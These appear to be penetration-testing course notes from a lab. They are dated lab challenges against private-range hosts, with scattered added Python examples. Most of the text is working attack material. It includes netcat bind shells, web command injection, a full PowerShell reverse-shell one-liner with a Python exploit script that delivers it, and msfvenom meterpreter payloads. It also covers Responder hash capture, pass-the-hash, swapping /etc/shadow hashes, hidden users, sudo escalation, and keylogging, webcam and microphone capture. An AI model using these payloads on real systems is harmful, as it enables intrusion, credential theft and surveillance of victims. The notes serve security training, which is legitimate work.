###INTERRUPT IN BOOT###
When the GRUB screen loads, press E to edit the boot entry and boot into a shell; the root filesystem comes up read-only, so remount it:
#mount -o remount,rw /
.##################################################################################
###OPEN A BACKDOOR###
on host A open a port that hands out a shell
#nc -lvp 667 -e /bin/bash
from host B connect to host A
#nc 192.168.0.110 667
.##################################################################################
###SCENARIO### ### DIRB & CURL ###
172.16.60.59 ##Target IP
Attack an IP: enumeration, get access, verify.
- find the problematic link with dirb (web directory brute-forcer)
- run the script in the suspicious file to open a session
root@CyberACAD:/home/dardan# curl http://172.16.60.59/index.php\?cmd\=nc+-lvp+31337+-e+/bin/bash
- to attach to the session opened above
dardan@CyberACAD:~$ nc 172.16.60.59 31337
echo 'index.php' | base64 ## encode (echo adds a newline, which is what the trailing "Cg==" encodes)
echo 'aW5kZXgucGhwCg==' | base64 -d ## decode
.##################################################################################
###SCENARIO###WORDPRESS###
download the archive
#wget http://wordpress.org/latest.zip
#wget http://wordpress.org/latest.tar.gz
unzip
#unzip latest.zip
#tar -zxvf latest.tar.gz
delete latest.zip
#rm -rf latest.zip
move the files to /var/www/html if you downloaded them somewhere else
#mv wordpress /var/www/html
move everything out of the wordpress folder one level up
#mv * ../
Access mysql
#mysql -u root -p
create the db
#create database dr;
edit the sample file
#vi wp-config-sample.php
#edit database name / user / password
replace the modified file
#mv wp-config-sample.php wp-config.php
in the browser create an account in WP
#http://IP or the name the apache service answers to
create a user in the web form
###Script to create, which downloads wordpress and executes all the steps as in the exercises###
#!/bin/bash
cd /var/www/html
wget http://wordpress.org/latest.zip
unzip latest.zip
cd wordpress
mv * ../
cd ..
rm -rf latest.zip wordpress
cp wp-config-sample.php wp-config.php
mysql -uroot -pPassword -e "create database xxDB;"
Or interactively:
mysql --host=localhost --user=root -pPassword
CREATE DATABASE xxDB;
SHOW databases;
chmod a+x wp-auto ## makes it executable
bash wp-auto ## or run it as a script
link http://www.codingpedia.org/ama/how-to-create-a-mysql-database-from-command-line/
.##################################################################################
###SCENARIO###Create SSH access without authenticating (key-based login, no password prompt)###
create ~/.ssh on the client; passwordless access from client to server
mkdir ~/.ssh/ ##create .ssh if it does not exist yet
server@CyberACAD:~/.ssh$ ssh-keygen ## generate keys
scp id_rsa.pub client@172.16.60.47:/home/client/.ssh/
client@xx:~/.ssh$ mv id_rsa.pub authorized_keys ## overwrites any existing keys; cat id_rsa.pub >> authorized_keys appends instead
ssh client@172.16.60.47 ## from server, log in as client without a password :) (the public key of the machine that connects goes into authorized_keys of the account being logged into)
#on the Server
ssh-keygen
touch authorized_keys
cat id_rsa.pub >> authorized_keys
## sshd ignores the key if ~/.ssh is not mode 700 and authorized_keys not 600
.##################################################################################
###backdoor, remote code execution, intro###
curl https://google.com ##reads the page content
curl https://google.com/x.php?cmd\=cat+/etc/passwd ##illustrative: a page that passes cmd= straight to the OS
cmd\=cat+/etc/passwd
cmd\=cat+/
curl http://172.16.60.59/run.php\?cmd\=nc+-lvp+31337+-e+/bin/bash
.##################################################################################
###SCENARIO###from mysql access to shell access###
\! nc -lvp 8888 -e /bin/bash ## \! runs a system command from the mysql client, as the OS user running the client
\! id
nc ip 8888
ls
id
Recap of the path: download wp, unzip, move the wp content to /html, mysql -u root -p, create database xx;, edit wp-config.php (db name, user, password), browse to http://IP, create user/password, install wordpress
cd /usr/share/webshells ## Kali's webshell collection
create a file with the code, run.php, upload it to /html
curl http://ip/run.php\?cmd\=nc+-lvp+1337+-e+/bin/bash
nc ip 1337
id
ls
cat wp-config.php ## holds the db credentials
python -c 'import pty; pty.spawn("/bin/bash")' ## upgrade to an interactive tty
mysql -uroot -pxxxx -e "\!
id" ## runs a system command through the mysql client non-interactively
python's "os" library gives the possibility to execute system commands
mysql -h ip ## connects to a remote host (-h host; capital -H means HTML output, not host)
.##################################################################################
###SCENARIO###Challenge###
1. Start an Apache web server, generate logs (at least 100 lines), and build an automated script with this logic: take the unique IPs, convert them to base64 and echo only the base64 values. I.e. read access.log, extract the IPs, sort them uniquely and output only their base64 values, not the plain text.
- start the apache web server
- generate logs
- script that extracts the IPs and converts them to base64
Solution:
#!/bin/bash
grep "172.16" /var/log/apache2/access.log | cut -d " " -f 1 | sort -u > ips.txt ## first field of a combined-log line is the client IP; the grep limits it to the lab subnet
for i in $(cat ips.txt); do printf '%s' "$i" | base64; done ## printf instead of echo so the trailing newline is not encoded
2. Research how to add a user without creating a home directory, so that it does not show up in ls /home/, basically a hidden user, and log in over SSH with this user that we created without a home directory.
3. Remove the hash, add your own hash, log in with the password of your hash, do the work and once done put back the hash that was there originally.
There is a password "ubuntu"; this password has a hash; the hash cannot be reversed back to "ubuntu" (it can only be guessed by brute force), it is always this hash value, and it is stored in /etc/shadow. We do not know that this hash's plain text is "ubuntu", which is why we must remove this hash and add a new hash whose password we know. E.g. we turn our own password into a hash and store that hash where we want to change the hash. Then we can log in with our password, do the work and afterwards restore the "ubuntu" hash.
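A Python version of the challenge 1 script, added here as an example (not part of the course notes): it parses Apache combined-log lines, keeps only first fields that are valid IP addresses, dedupes and sorts them, and base64-encodes each without the trailing newline that a bare echo would add. The log lines are constructed samples, and the 172.16 prefix filter mirrors the grep in the bash solution.

```python
import base64
import ipaddress
import re
import sys

# Constructed sample of Apache combined-log lines; not a real access.log.
SAMPLE_LOG = """\
172.16.60.5 - - [16/May/2018:10:01:02 +0200] "GET / HTTP/1.1" 200 612 "-" "curl/7.58.0"
172.16.60.7 - - [16/May/2018:10:01:05 +0200] "GET /index.php?cmd=id HTTP/1.1" 200 88 "-" "Mozilla/5.0"
172.16.60.5 - - [16/May/2018:10:01:09 +0200] "GET /robots.txt HTTP/1.1" 404 209 "-" "dirb"
10.0.1.4 - - [16/May/2018:10:02:00 +0200] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
garbage line that is not an access log entry
172.16.60.7 - - [16/May/2018:10:02:30 +0200] "GET /run.php?cmd=nc HTTP/1.1" 200 12 "-" "curl/7.58.0"
"""

# The client address is the first whitespace-delimited field of a combined-log line.
IP_FIELD = re.compile(r"^(\S+)\s")


def _sort_key(ip_text):
    # Sort numerically, IPv4 before IPv6 (ipaddress objects of different versions do not compare).
    addr = ipaddress.ip_address(ip_text)
    return (addr.version, int(addr))


def unique_ips(log_text, prefix=None):
    """Sorted list of distinct client IPs; non-IP first fields are discarded,
    and prefix (e.g. '172.16') restricts the result the way grep did in the bash version."""
    found = set()
    for line in log_text.splitlines():
        m = IP_FIELD.match(line)
        if not m:
            continue
        token = m.group(1)
        try:
            ipaddress.ip_address(token)
        except ValueError:
            continue  # hostname, garbage, or a malformed line
        if prefix and not token.startswith(prefix):
            continue
        found.add(token)
    return sorted(found, key=_sort_key)


def encode_ips(ips):
    """Base64 of each IP string without a newline (echo without -n would encode '\\n' too)."""
    return [base64.b64encode(ip.encode()).decode() for ip in ips]


def decode_ips(encoded):
    """Reverse of encode_ips, to check that the encoded values round-trip."""
    return [base64.b64decode(s).decode() for s in encoded]


if __name__ == "__main__":
    # Usage: python ips2b64.py /var/log/apache2/access.log   (falls back to the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for value in encode_ips(unique_ips(text, prefix="172.16")):
        print(value)
```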
There is a sha512-crypt hash ($6$) in /etc/shadow. We forgot the password but want access to the machine: how to change the hash (i.e. change the password), do the work and put back the old hash.
sudo cat /etc/shadow
Solved by Arben:
Creating a user that has no /home directory: https://asciinema.org/a/To1xwcgCmjb06umuOUGIAO2vF
the option "--no-create-home" creates a user without a home directory, but when we try to reach it over ssh or another protocol we cannot, because reading /etc/passwd shows that user has no "entry point", i.e. no shell /bin/bash
the options "--no-create-home --shell /bin/bash" do the opposite of the command above
Adding or changing a user's password by modifying /etc/shadow. Several methods exist, 4 of them are:
https://asciinema.org/a/zk6zChlDAhR9fIrXMz5bVPckV | chpasswd
https://asciinema.org/a/hKSm9dZCY2pOqLWhAC2nr59Db | openssl
https://asciinema.org/a/PKUxOrkmvLJyuk0DlISJc8Xpb | perl
https://asciinema.org/a/y0mzjwp4YsoRTE17GGxwTIEcX | python
----------------------------------------------------------------------------
python -c 'import crypt; print(crypt.crypt("arben123", "$6$SalTTeSt$"))' ## $6$ = sha512-crypt; the crypt module is deprecated since Python 3.11 and removed in 3.13
perl -e 'print crypt("arben123","\$6\$saltsalt\$") . "\n"'
openssl passwd -1 -salt CyBeR arben2 ## -1 gives an md5-crypt ($1$) hash, not $6$; OpenSSL 1.1.1+ has -6 for sha512-crypt
echo "username:password" | chpasswd ## lets the system hash it; needs root
.##################################################################################
###SCENARIO###Challenge##
1. Find a file that contains keys for a certain protocol,
2. Connect as a certain user using a command that lets you specify the key,
3.
Execute commands via sudo and read a file in the /root folder.
Find a file that contains keys for a certain protocol and use it to connect over a protocol that is secure; the user is not a full sudoer but is allowed to execute some commands as sudo.
Hint: 172.16.60.81
cmd=cd+/root
base64
ls -al
ssh -i <key file> IP
sudo /bin/cat
.##################################################################################
###SCENARIO##Export SAM and system file###
reg save hklm\sam c:\sam
reg save hklm\system c:\system
##tool to open the sam and system files
pwdump system sam (run in the folder where the sam and system files are located)
.##################################################################################
###SCENARIO###Responder & John & PASS the HASH###
RESPONDER
#cd /usr/share/responder/
#python Responder.py -i 192.168.1.50 -I eth0
Simulate a user typing the wrong SMB server name, SNARE01 instead of SHARE01. The name does not resolve in DNS, so the client falls back to LLMNR/NBT-NS, Responder answers the broadcast, the client authenticates to it (the NetNTLMv2 challenge/response is captured) and Windows reports that it cannot access the share.
#cd logs/
ls (to confirm that the hash log file was created)
JOHN
#john SMBv2-NTLMv2-SSP-192.168.1.8.txt
john hash2.txt --wordlist=/root/Desktop/rockyou.txt
john --show hash2.txt
cat ~/.john/john.pot ## cracked passwords are cached here
john hh.txt --wordlist=/root/Desktop/rockyou.txt
john hh.txt --show
PASS the HASH
## only an NT hash (from the SAM dump above) can be passed; the NetNTLMv2 response Responder captures can be cracked or relayed, not passed
cd pth-toolkit-master/
./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 cmd
./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 'net user a a /add'
pth-winexe -U Workgroup/Administrator%5274a8ac31638590:B206D78784758497FE2540F99BDF7BF0 //192.168.1.8 cmd
xfreerdp /u:administrator /d:Workgroup /pth:B206D78784758497FE2540F99BDF7BF0 /v:192.168.1.8 ## /pth only works if the target has Restricted Admin mode enabled
*How to Secure Networks against LLMNR / NBT-NS Poisoning Attacks*
The good news is this attack is fairly easy to prevent.
Note that both LLMNR and NetBIOS Name Service need to be disabled; if you only disable LLMNR then Windows will fail over to NetBIOS Name Service for resolution. LLMNR is switched off with the Group Policy "Turn off multicast name resolution" (Computer Configuration > Administrative Templates > Network > DNS Client); NBT-NS under the adapter's WINS settings ("Disable NetBIOS over TCP/IP").
.##################################################################################
###SCENARIO###Challenge###16.05.2018
target 172.16.60.85 Ubuntu-10ubuntu0.1
PORT   STATE SERVICE
80/tcp open  http
1 # dirb http://172.16.60.85 ## finds http://172.16.60.85/id_rsa
2 # wget http://172.16.60.85/id_rsa
  # chmod 400 id_rsa ## ssh refuses a private key that others can read
  # ssh -i id_rsa cyberacademy@172.16.60.85 ## gets access, prompt $
3 $ ps -aux ## to see the executable file
  $ locate xxxx.py ## to find its location
  $ cd /usr/bin
  $ python2.7 Administrator_Password.py ## this prints the data for the next target
  The next target was a Windows box; its credentials were given in that file.
4 - with the data found, connect over RDP to the target PC
  - another method, from a linux OS: # rdesktop -u Administrator 172.16.65.92
  - click Ease of Access on the login screen (a cmd opens if the accessibility binary was replaced with cmd.exe beforehand)
  - find the hidden file with info on the next target
5 on the next target machine
  $ sudo -l ## shows the commands this user may run via sudo
  $ sudo python -c 'import pty;pty.spawn("/bin/bash");' # :)
.##################################################################################
###SCENARIO###Challenge###18.05.2018
Target 172.16.60.92
Basic Linux Commands https://www.youtube.com/watch?v=tgcxc1xg87Y
rdesktop (ip) -r disk:share=/home/bayo/store ## shares a local folder into the RDP session
172.16.60.92: 3389 22 445
Linux: # rdesktop 172.16.65.120 -r disk:share=/usr/share/windows-binaries ## exposes Kali's nc.exe to the Windows host
Windows: > nc.exe -lvp 777 -e cmd.exe
Linux: nc 172.16.60.67 777
.##################################################################################
###SCENARIO###msfvenom & msfconsole###
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -f exe -o foto.exe
mv foto.exe tmp/
python -m SimpleHTTPServer 80 ## serve it over http
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > set lhost 172.16.60.68
msf exploit(multi/handler) > set lport 5560 ## must match the LPORT baked into foto.exe (5560 above); a handler on 4477 would never see the connection
msf exploit(multi/handler) > exploit
waits until someone executes the malware, in this case hosted over http; once the malware is executed the session comes in
sessions
sessions -i 5 ## session number
.##################################################################################
###SCENARIO###Challenge###21.05.2018
identify alive hosts
seq 1 254
for i in $(seq 1 254); do ping -c 1 '172.16.60.'$i; done > output.txt
grep 'bytes from' output.txt | cut -d ' ' -f 4 | tr -d ':' ## only hosts that replied; grepping 'bytes of data' lists every address pinged, answered or not
nmap 172.16.60.0/24 ###1 check alive hosts, check the top 1000 well known ports (nmap's default)
nmap -sn 172.16.60.1/24 ## -sn only checks whether the host is up, no port scan
nmap 172.16.60.1/24 -p- ## -p- checks the full port range
nmap -sS -sV 172.16.1.172 -p5988 ### check a specific port
### attempts on the open ports found via nmap
ftp: try anonymous/anonymous
ftp 172.16.1.19
telnet 172.16.1.19 21
telnet 172.16.1.19
after you have shell access: ssh -R cyberacademy2018:80:localhost:80 serveo.net ## exposes local port 80 through serveo
rtsp 554: with vlc, network url rtsp://172.16.1.19:554
snmp: sudo msfconsole, auxiliary snmp scanner, set the community file, exploit
search ms17-010 windows
# searchsploit "windows server 2008"
# locate windows/remote/41987.py
./pth-winexe -U WORKGROUP/user%hash //172.16.1.204 cmd ### pass the hash
----------------------------------------------------------------------------
library hijack
# aa.py imports random_useragent; Python resolves imports from the script's own directory first,
# so a writable script directory lets an attacker plant a random_useragent.py that runs on import.
import os
import sys
import random_useragent

while True:
    ping = input("input: ")
    if '&&' in ping:
        print("hacker....")
        sys.exit()
    elif '|' in ping:
        print("hacker....")
    else:
        os.system('ping {}'.format(ping))  # the string still goes through the shell: ';', newline and $() are not filtered

python aa.py
input: import os;os.system('net user a a /add') ## payload for the planted random_useragent.py (Windows target)
.##################################################################################
###SCENARIO###SSHUTTLE###23.05.2018
sshuttle
Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
sshuttle -r turbo@172.16.65.117 ## routes traffic through the ssh host; sshuttle also needs the subnet(s) to route, e.g. 10.0.1.0/24 or 0/0
ssh -R cyberacademy2018:80:localhost:80 serveo.net ## http://cyberacademy.serveo.net/
injection through the web app's ping field:
google.com | ifconfig
google.com | nc -lvp 5555 -e /bin/bash
google.com && ls
172.16.65.117 (linux)
nc 172.16.65.117 5555
on this target ps -aux (you see a process turbo_is_turbo)
cat /etc/passwd (to verify the user turbo)
putty 172.16.65.117 turbo/turbo
sudo -l (find is found with root privileges)
sudo find /etc/passwd -exec /bin/sh \; ## find runs the -exec command as root
sudo find /etc/passwd -exec nc -lvp 7878 -e /bin/sh \;
id
nc 172.16.65.117 7878
id
cat info.txt (target 172.16.65.120)
rdesktop 172.16.65.120
press Shift 5 times ## sticky keys prompt; a cmd opens if sethc.exe was replaced beforehand
ipconfig (you see the host is also connected to another network)
arp -a (you see that 10.0.1.4 has talked to the local host 10.0.1.3)
scan the ports with nc or nmap (21, 22, 80 are found)
on http of 10.0.1.4 the browser shows a user and a password
sudo python -c 'import pty;pty.spawn("/bin/bash");'
.##################################################################################
###SCENARIO###Challenge PowerSHELL###25.05.2018
power shell
cat oneliner.tcp
ip: 172.16.60.54
nmap -sV 172.16.60.54 ## 80 is found open
on the local machine: nc -lnvp 5588 ## the listener port has to be the one in the one-liner (443 below)
through the web app on the target IP run this shell command:
google.com|powershell -command "$client = New-Object System.Net.Sockets.TCPClient('172.16.60.108',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
this gives us shell access on the target
go to the user's desktop
C:\users\arben\Desktop> Get-Item -Path C:\Users\arben\Desktop\root.txt -Stream * ## lists the file's alternate data streams
Get-Content -Path C:\Users\arben\Desktop\root.txt -Stream target.txt ## reads the hidden stream
cyber@172.16.60.65 pass: 123Arben123
with these
credentials found we log in via ssh
ssh cyber@172.16.60.65 pass: 123Arben123
$ sudo -l ## /bin/dash /home/cyber/root_me is found
$ cat /home/cyber/root_me ## the script's content is shown
#!/bin/dash
sudo /bin/dash /home/cyber/root_me # :) root
-----------------------------------------------------------------------------
nano exploit.py
#!/usr/bin/env python
# sends the PowerShell reverse-shell one-liner through the vulnerable ping parameter of system.php
import sys
import requests

if len(sys.argv) != 3:
    sys.exit("usage: python exploit.py <listener ip> <listener port>")
ip = sys.argv[1]
port = sys.argv[2]
# the query string is the URL-encoded one-liner above; the two {} receive the listener ip and port
r = requests.get("http://172.16.60.54/system.php?ping=google.com+%26%26+powershell+-command+%22%24client+%3D+New-Object+System.Net.Sockets.TCPClient%28%27{}%27%2C{}%29%3B%24stream+%3D+%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes+%3D+0..65535%7C%25%7B0%7D%3Bwhile%28%28%24i+%3D+%24stream.Read%28%24bytes%2C+0%2C+%24bytes.Length%29%29+-ne+0%29%7B%3B%24data+%3D+%28New-Object+-TypeName+System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C+%24i%29%3B%24sendback+%3D+%28iex+%24data+2%3E%261+%7C+Out-String+%29%3B%24sendback2++%3D+%24sendback+%2B+%27PS+%27+%2B+%28pwd%29.Path+%2B+%27%3E+%27%3B%24sendbyte+%3D+%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22".format(ip, port))
print(r.status_code)

python exploit.py IP (with the listen port open) port
python exploit.py 172.16.60.68 4433
.##################################################################################
###SCENARIO###msfvenom###
msfvenom -p windows/meterpreter/bind_tcp LPORT=4477 -f exe -o BIND_TCP.exe
msfconsole
> use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
set lport 4477
set rhost 172.16.60.76 ## bind shell: the handler connects out to the target, so it needs RHOST
.##################################################################################
###SCENARIO###msfvenom###
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -f elf -o reverse_tcp.elf ## -f elf is the output format; -e would select an encoder
msfconsole
> use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
> set lhost 172.16.60.68
> set lport 5560
chmod a+x reverse_tcp.elf
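The ping wrapper in the library-hijack note and the `google.com && powershell ...` / `google.com | nc ...` payloads above are the same bug: user input concatenated into a string that /bin/sh parses. This added example (not course code) shows the wrapper's blacklist beside inputs that slip past it, runs those through /bin/sh with `ping` swapped for `echo` so nothing is actually pinged, and then the allow-list plus `shell=False` fix. It assumes Linux with /bin/sh; the hostnames and addresses are constructed.

```python
import ipaddress
import re
import subprocess


def vulnerable_command(user_input):
    """The course wrapper's logic: reject '&&' and '|', then build a string for os.system()."""
    if "&&" in user_input or "|" in user_input:
        raise ValueError("hacker....")  # the original prints this and exits
    return "ping -c 1 {}".format(user_input)


def passes_blacklist(user_input):
    try:
        vulnerable_command(user_input)
    except ValueError:
        return False
    return True


# Inputs the blacklist accepts that still run a second command once /bin/sh parses the string.
BYPASSES = [
    "google.com; id",      # ';' separates commands
    "google.com\nid",      # so does a newline
    "google.com $(id)",    # command substitution runs before ping even starts
    "google.com `id`",
]


def simulate_shell(user_input):
    """Feed the vulnerable string to /bin/sh with 'ping' replaced by 'echo' (no packets sent)."""
    cmd = vulnerable_command(user_input).replace("ping -c 1", "echo ping -c 1", 1)
    return subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True).stdout


# RFC 1123 hostname syntax; IP literals are accepted via ipaddress instead.
_HOSTNAME = re.compile(
    r"(?=.{1,253}\Z)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*", re.I)


def validate_target(user_input):
    """Allow-list check: return the input if it is an IP address or a hostname, else raise."""
    try:
        return str(ipaddress.ip_address(user_input))
    except ValueError:
        pass
    if _HOSTNAME.fullmatch(user_input):
        return user_input
    raise ValueError("rejected: %r is not a host" % user_input)


def is_rejected(user_input):
    try:
        validate_target(user_input)
    except ValueError:
        return True
    return False


def hardened_argv(user_input):
    """argv for subprocess.run(..., shell=False): the target is one argument and is never shell-parsed."""
    return ["ping", "-c", "1", validate_target(user_input)]


def run_ping(user_input, timeout=5):
    """The fixed wrapper: metacharacters in user_input are either rejected or passed to ping literally."""
    return subprocess.run(hardened_argv(user_input), capture_output=True, text=True, timeout=timeout).returncode


if __name__ == "__main__":
    for payload in BYPASSES:
        demo = payload.replace("id", "echo INJECTED")
        print(repr(payload), "passes the blacklist; sh output:", simulate_shell(demo).strip().replace("\n", " | "))
    for payload in ["google.com", "172.16.60.54"] + BYPASSES:
        print(payload.replace("\n", "\\n"), "->", "rejected" if is_rejected(payload) else hardened_argv(payload))
```

The allow-list matters more than `shell=False` alone: with `shell=False` a value such as `-c 100000 google.com` is still handed to ping as arguments, which the hostname check stops because it rejects spaces and a leading dash.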
## run reverse_tcp.elf on the target; the handler waits for (serves) the incoming connection
.##################################################################################
###SCENARIO### Challenge###30.05.2018
=====================
Target: 172.16.65.97
windows/smb/ms08_067_netapi
windows/smb/psexec
run post/windows/manage/enable_rdp
run post/windows/gather/ (tab-complete to pick a gather module)
sysinfo
netstat -a
meterpreter > shell
ipconfig, cd c:\, reg save hklm\sam and hklm\system, net user
net localgroup administrators user /add
net user test ters /add
net localgroup administrators test /add
net user test /active:yes
net user Administrator
background
getsystem
getuid
getpid
ps
pkill 2420
migrate 1756 ##moves into another process
keyscan_start
webcam_snap ##take a webcam snapshot
webcam_stream
record_mic -d 10
msf exploit(windows/smb/psexec) > sessions (tab-complete)
> sessions -i 2
.##################################################################################
###SCENARIO###msfconsole### 01.06.2018
target: 172.16.60.96
method: buffer overflow, banner grabbing, metasploit, search the vulnerabilities, exploitation
nmap 172.16.60.96
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
nmap -sV --script=banner 172.16.60.96
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.7 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.7
80/tcp open  http    BadBlue httpd 2.7
Service Info: Host: IEWIN7; OS: Windows; CPE: cpe:/o:microsoft:windows
msf > search badblue
Name                                       Disclosure Date  Rank   Description
----                                       ---------------  ----   -----------
exploit/windows/http/badblue_ext_overflow  2003-04-20       great  BadBlue 2.5 EXT.dll Buffer Overflow
exploit/windows/http/badblue_passthru      2007-12-10       great  BadBlue 2.72b PassThru Buffer Overflow
###get the first session
msf > use exploit/windows/http/badblue_passthru
msf exploit(badblue_passthru) > show options
msf exploit(badblue_passthru) > set RHOST 172.16.60.96
msf exploit(badblue_passthru) > set TARGET 1
msf exploit(badblue_passthru) > exploit
meterpreter > sysinfo
###use the session created above
msf > use
exploit/windows/local/bypassuac_injection
msf exploit(bypassuac_injection) > show options
msf exploit(bypassuac_injection) > set SESSION 1
msf exploit(bypassuac_injection) > exploit
meterpreter > getuid
meterpreter > getsystem ## works from the UAC-bypassed (high integrity) session
meterpreter > getuid
msf > use post/windows/gather/credentials/sso
msf post(sso) > show options
msf post(sso) > set SESSION 2
msf post(sso) > run
[*] Running module against IEWIN7
Windows SSO Credentials
=======================
AuthID   Package  Domain  User         Password
------   -------  ------  ----         --------
0;72208  NTLM     IEWIN7  IEUser       Passw0rd!
0;72208  NTLM     IEWIN7  IEUser
0;72286  NTLM     IEWIN7  IEUser       Passw0rd!
0;72286  NTLM     IEWIN7  IEUser
0;83203  NTLM     IEWIN7  sshd_server  D@rj33l1ng
0;83203  NTLM     IEWIN7  sshd_server
[*] Post module execution completed
.##################################################################################
###SCENARIO###nmap, hydra or medusa###01.06.2018
root@kali:/# nmap -sV --script=banner 172.16.60.76
Nmap scan report for 172.16.60.76
Host is up (0.0066s latency).
Not shown: 986 closed ports
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: Host: ARBEN-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
brute-force RDP with hydra or medusa using rockyou.txt, e.g. hydra -t 1 -l Administrator -P /root/Desktop/rockyou.txt rdp://172.16.60.76 (hydra's rdp module wants a low task count)
.##################################################################################
###SCENARIO###msfvenom & msfconsole### ##Challenge##04.06.2018
TARGET: 172.16.60.91
msfvenom -p python/meterpreter/reverse_tcp lhost=172.16.60.x lport=9999 -f raw >shell.py ## lhost = your own IP (172.16.60.78 below)
msfconsole -q
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
show options
set lhost 172.16.60.78
set lport 9999
exploit -j ## runs the handler as a background job
cat shell.py
copy the content of shell.py and paste it into the python interpreter on the web
wait for the session
sessions
sessions -i 1
getuid
shell
bash
python -c 'import pty; pty.spawn("/bin/bash")'
ls
debugger.sh
cat debugger.sh ...
.##################################################################################
###SCENARIO### version of ftp running on target
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(ftp_version) > set RPORT 21
RPORT => 21
msf auxiliary(ftp_version) > exploit
[*] 127.0.0.1:21 - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) >
.##################################################################################
###BANNER GRABBING
nmap -sS -p 80 -A 192.168.0.1 ## -A: version detection, OS detection, default scripts and traceroute
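Banner grabbing without nmap, as an added example (not from the course notes): a socket grabber that reads whatever the service sends first, or sends a HEAD request for HTTP since web servers wait for the client, and a parser that pulls product and version out of FTP, SSH and HTTP banners. The `220 (vsFTPd 3.0.3)` banner comes from the ftp_version output above; the SSH and HTTP samples, the port-based HTTP/SMTP heuristics and the hostnames are constructed assumptions.

```python
import re
import socket

# product followed by a separator and a dotted version: "vsFTPd 3.0.3", "OpenSSH_6.7p1", "Apache/2.4.29"
_PRODVER = re.compile(r"(?P<prod>[A-Za-z][A-Za-z0-9-]*)[ /_-]v?(?P<ver>\d+(?:\.\d+)*[A-Za-z0-9]*)")


def grab_banner(host, port, timeout=3.0, nbytes=1024):
    """Connect and return the first bytes the service sends. FTP, SSH and SMTP speak first;
    HTTP waits for a request, so a minimal HEAD is sent to obtain the Server: header."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if port in (80, 8080, 8000):
            s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        try:
            return s.recv(nbytes)
        except socket.timeout:
            return b""


def _result(service, desc):
    m = _PRODVER.search(desc)
    if m:
        return {"service": service, "product": m.group("prod"), "version": m.group("ver")}
    words = desc.split()
    return {"service": service, "product": words[0] if words else None, "version": None}


def parse_banner(raw, port=None):
    """Classify a banner and extract product/version; None if the service sent nothing."""
    text = raw.decode("latin-1", "replace").strip()
    if not text:
        return None
    m = re.match(r"SSH-(\d\.\d+)-(\S+)", text)
    if m:
        return _result("ssh", m.group(2))            # e.g. OpenSSH_6.7
    if text.startswith("HTTP/"):
        for line in text.splitlines()[1:]:
            if line.lower().startswith("server:"):
                return _result("http", line.split(":", 1)[1].strip())
        return {"service": "http", "product": None, "version": None}
    if re.match(r"220[ -]", text):                    # FTP and SMTP both greet with 220
        service = "smtp" if port in (25, 587) else "ftp"
        return _result(service, text[4:].strip("()"))
    return _result("unknown", text)


if __name__ == "__main__":
    import sys
    # Usage: python banner.py 172.16.60.96 22
    host, port = sys.argv[1], int(sys.argv[2])
    raw = grab_banner(host, port)
    print(raw)
    print(parse_banner(raw, port))
```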